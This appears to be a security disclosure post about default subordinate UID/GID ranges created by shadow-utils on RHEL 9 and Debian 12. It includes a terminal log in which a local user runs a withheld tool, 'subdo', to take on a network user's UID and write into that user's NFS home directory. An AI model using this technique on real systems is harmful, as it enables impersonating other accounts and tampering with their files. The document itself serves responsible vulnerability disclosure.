It appears that shadow-utils for Linux is now shipping an /etc/login.defs file that pre-defines ranges of subordinate UID's and GID's in it. This means that adding local users to the system will result in entries being created automatically in /etc/subuid and /etc/subgid for them, with a unique range per a user, starting at UID/GID 100,000.
On a fresh install of Red Hat Enterprise Linux 9, I already have a local user (jon) that was added as part of the install. This resulted in an entry for it in /etc/subuid and /etc/subgid giving it the subordinate ID's 100000-165535. I then add a second user (testacct), confirming that indeed another entry was created in /etc/subuid for this new user, delegating ID's 165536 - 331072 to it.
Why is this a problem?
Entries in /etc/subuid and /etc/subgid are commonly thought of as being used for containers, but it's not solely for "containers." While containerization is certainly the largest use-case, the subordinate ID configuration is meant to delegate the right to use specified ID's by a user within namespaces. Although just randomly becoming or using those ID's is not the most straight-forward thing to do - for instance, you can't just su or setuid to them - it's still relatively trivial to actually become and use those ID's on the system when you understand how the namespacing works.
As a simple POC, let's look at the following (code below):
In the above, we can see that the user 'jon' has a delegation for 100000 - 165535. Again, this was done solely by adding a user and I did not configure this. Using a quick python script, and changing the uidmapping on the process namespace as that very same user, I can now effectively execute my sleep command as the ID I choose within the delegated range. In the above example, I've executed my sleep command as UID 160000.
In short, such a configuration allows the user to execute any command they wish as any UID/GID delegated to them in /etc/subuid and /etc/subgid.
If you work in a large infrastructure, you undoubtedly have valid ID's that are in the 100000+ range. This assumption puts those ID's at risk of potentially unintended impersonation through numerous vectors should local accounts be added to the system and users have access to them.
Further, if this has been done for login.defs, where else may this assumption end up creeping in?
I have no doubt that this was done with the intention of leveraging rootless containerization, a trend rapidly rising across multiple organizations. However, no distribution - and no component running on a distribution - should be making these kinds of assumptions on your organizations behalf.
This was tested and confirmed on both Debian 12 and Red Hat Enterprise Linux 9.
POC
Debian, Red Hat and shadow-utils maintainers have been contacted and I'm awaiting response before releasing the POC code.
The below shows the abuse in action. As my local user created during OS install, I am able to compromise the network account of another user and write files to their NFS home directory.
jon@localhost ~]$ id;uname -a;cat /etc/subuid
uid=1000(jon) gid=1000(jon) groups=1000(jon),10(wheel)
Linux localhost.localdomain 5.14.0-503.14.1.el9_5.aarch64 #1 SMP PREEMPT_DYNAMIC Fri Nov 15 07:14:03 EST 2024 aarch64 aarch64 aarch64 GNU/Linux
jon:100000:65536
[jon@localhost ~]$ getent passwd msteph
msteph:x:108472:108472::/mnt/home/msteph:/bin/bash
[jon@localhost ~]$ ls -al subdo;getcap subdo
-rwxr-xr-x 1 jon jon 72936 Dec 22 23:12 subdo
[jon@localhost ~]$ ./subdo -u 108472 -g 108472 -r 1 bash
bash: /home/jon/.bashrc: Permission denied
bash-5.1$ id
uid=108472(msteph) gid=108472(msteph) groups=108472(msteph),65534(nobody)
bash-5.1$ cd ~msteph
bash-5.1$ ls -al
total 16
drwx------ 3 msteph nobody 99 Dec 22 23:19 .
drwxr-xr-x. 8 nobody nobody 85 Dec 22 23:18 ..
-rw------- 1 msteph msteph 20 Dec 22 23:19 .bash_history
-rw-r--r-- 1 msteph nobody 18 Apr 30 2024 .bash_logout
-rw-r--r-- 1 msteph nobody 141 Apr 30 2024 .bash_profile
-rw-r--r-- 1 msteph nobody 492 Apr 30 2024 .bashrc
drwxr-xr-x 4 msteph nobody 39 Dec 20 09:10 .mozilla
bash-5.1$ touch testing123
bash-5.1$ ls -aal
total 16
drwx------ 3 msteph nobody 117 Dec 22 23:23 .
drwxr-xr-x. 8 nobody nobody 85 Dec 22 23:18 ..
-rw------- 1 msteph msteph 20 Dec 22 23:19 .bash_history
-rw-r--r-- 1 msteph nobody 18 Apr 30 2024 .bash_logout
-rw-r--r-- 1 msteph nobody 141 Apr 30 2024 .bash_profile
-rw-r--r-- 1 msteph nobody 492 Apr 30 2024 .bashrc
drwxr-xr-x 4 msteph nobody 39 Dec 20 09:10 .mozilla
-rw-r--r-- 1 msteph msteph 0 Dec 22 23:23 testing123
bash-5.1$
